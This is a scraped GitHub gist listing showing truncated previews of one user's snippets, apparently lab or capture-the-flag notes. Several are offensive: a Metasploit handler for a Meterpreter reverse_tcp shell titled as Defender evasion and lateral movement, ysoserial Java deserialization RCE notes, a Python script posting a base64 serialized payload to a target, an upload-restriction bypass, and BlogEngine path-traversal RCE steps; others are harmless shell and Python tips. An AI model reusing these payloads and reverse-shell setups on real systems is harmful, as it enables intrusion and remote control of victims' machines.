dualfade
dualfade
/ gist:48c45fb47ff273a3996c9a4f10ac9d72
Created
March 26, 2019 05:43
Microsoft Windows Server 2019 Standard ( 10.0.17763 N/A Build 17763 ) - WD / BL Evasion - Priv Esc Lateral Move
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MODIFIED VEIL HANDLER -- | |
| msfc -r /var/lib/veil/output/handlers/3fb7Jq79.rc | |
| /* | |
| use exploit/multi/handler | |
| set PAYLOAD windows/x64/meterpreter/reverse_tcp | |
| set LHOST 10.10.14.13 | |
| set LPORT 3434 | |
| set ExitOnSession false | |
| exploit -j |
dualfade
/ gist:76d99ad0829ceef3a83761dbeee3b66d
Last active
August 10, 2019 15:26
Encrypted Java Serialized RCE --
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- CREATE SERIALIZED PAYLOAD -- | |
| NOTE -- | |
| Downgrade to Java 8 !! | |
| Java 9+ shits out... | |
| -- ENCRYPT -- | |
| https://github.com/frohoff/ysoserial | |
| https://github.com/pimps/ysoserial-modified |
dualfade
/ gist:c09c61fa430bfb5f263f87a082de6911
Last active
August 31, 2019 19:23
Disabled Content-Disposition bypass --
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REMOVE CONTENT-LENGTH -- | |
| POST -- | |
| HTML SRC -- | |
| <div class="row featurette"> | |
| <div class="col-md-12"> | |
| <h2 class="featurette-heading">Plugin Upload.<span class="text-muted"> Admins Only!</span></h2> | |
| <p class="lead">Upload new plugins to include on this status page using the upload form below.</p> | |
| <form action="addon-upload.php" method="POST" enctype="multipart/form-data"> | |
| <input type="file" name="addon" /> |
dualfade
/ gist:6bab381cc154fa4f1d8744329c786330
Created
June 5, 2019 03:22
serialized payload inj --
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| import hmac | |
| import base64 | |
| import requests | |
| url = 'http://10.10.10.130:8080/userSubscribe.faces' | |
| # re check the payload maybe generate it from kali (ysoserial pipe to base64) and make sure it is java 8 in order for it to work. | |
| payload = 'rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAA3NyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAAU3QAJnlzb3Nl |
dualfade
/ gist:389eb00ed66aa1fa2940d8d0ee669e02
Created
June 22, 2019 22:27
BlogEngine RCE / PostView.ascx
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Ref -- | |
| https://www.exploit-db.com/exploits/46353 | |
| https://securityboulevard.com/2019/03/remote-code-execution-in-blogengine-net/ | |
| Exploit PATH -- | |
| UPLOAD -- | |
| http://target:port/BlogEngine/admin/app/editor/editpost.cshtml | |
| POST -- | |
| http://target:port/BlogEngine/?theme=../../App_Data/files |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if [[ "$TERM" != dumb ]] && (( $+commands[grc] )) ; then | |
| # Supported commands | |
| cmds=( | |
| whois \ | |
| wdiff \ | |
| vmstat \ | |
| uptime \ | |
| ulimit \ | |
| tune2fs \ |
dualfade
/ gnome-tracker-disable
Created
September 11, 2019 22:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # from my brother @t0nelok -- | |
| # very useful -- | |
| #!/bin/sh | |
| for i in /etc/xdg/autostart/tracker-*.desktop; do | |
| echo -e "Hidden=true" | sudo tee --append "$i" >/dev/null | |
| done | |
| gsettings set org.freedesktop.Tracker.Miner.Files crawling-interval -2 |
dualfade
/ gist:0e66d333c93959aa5047f98cd03c093c
Last active
November 26, 2019 01:23
itertools python3 --
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| For my Own ref -- | |
| Pin Based -- | |
| import string | |
| import itertools | |
| def main(): | |
| for word in map(''.join, itertools.product(string.digits,repeat=int(5))): | |
| r_word = ''.join(reversed(word)) |
dualfade
/ gist:3478227a0b0721b1e057a2cd9bb431fc
Created
November 26, 2019 01:32
string intval python3 --
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Python3 intval equiv -- | |
| # get intval from string -- | |
| i_var = ''.join(x for x in var1 if x.isdigit()) | |
| # pull 1st 4 chars -- | |
| i_var = ''.join(x for x in var2[:4] if x.isdigit()) |
dualfade
/ gist:38deff5d4d483b6d4bb4d7ad7da853bf
Last active
December 31, 2019 03:01
local PT repositories --
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| repos cd $GIT | |
| Github for i in `find . -name .git 2>/dev/null` ; do echo $i && cat $i/config | ag url; done | uniq | |
| ./Snoop/pspy/.git | |
| url = [email protected]:DominicBreuker/pspy.git | |
| ./Misc/Audio/spotify-cli-linux/.git | |
| url = [email protected]:pwittchen/spotify-cli-linux.git | |
| ./Misc/hurl/.git | |
| url = https://gitlab.com/kalilinux/packages/hurl.git | |
| ./Misc/Devel/vim-python-ide/vim-python-ide/.git | |
| url = https://github.com/rapphil/vim-python-ide.git |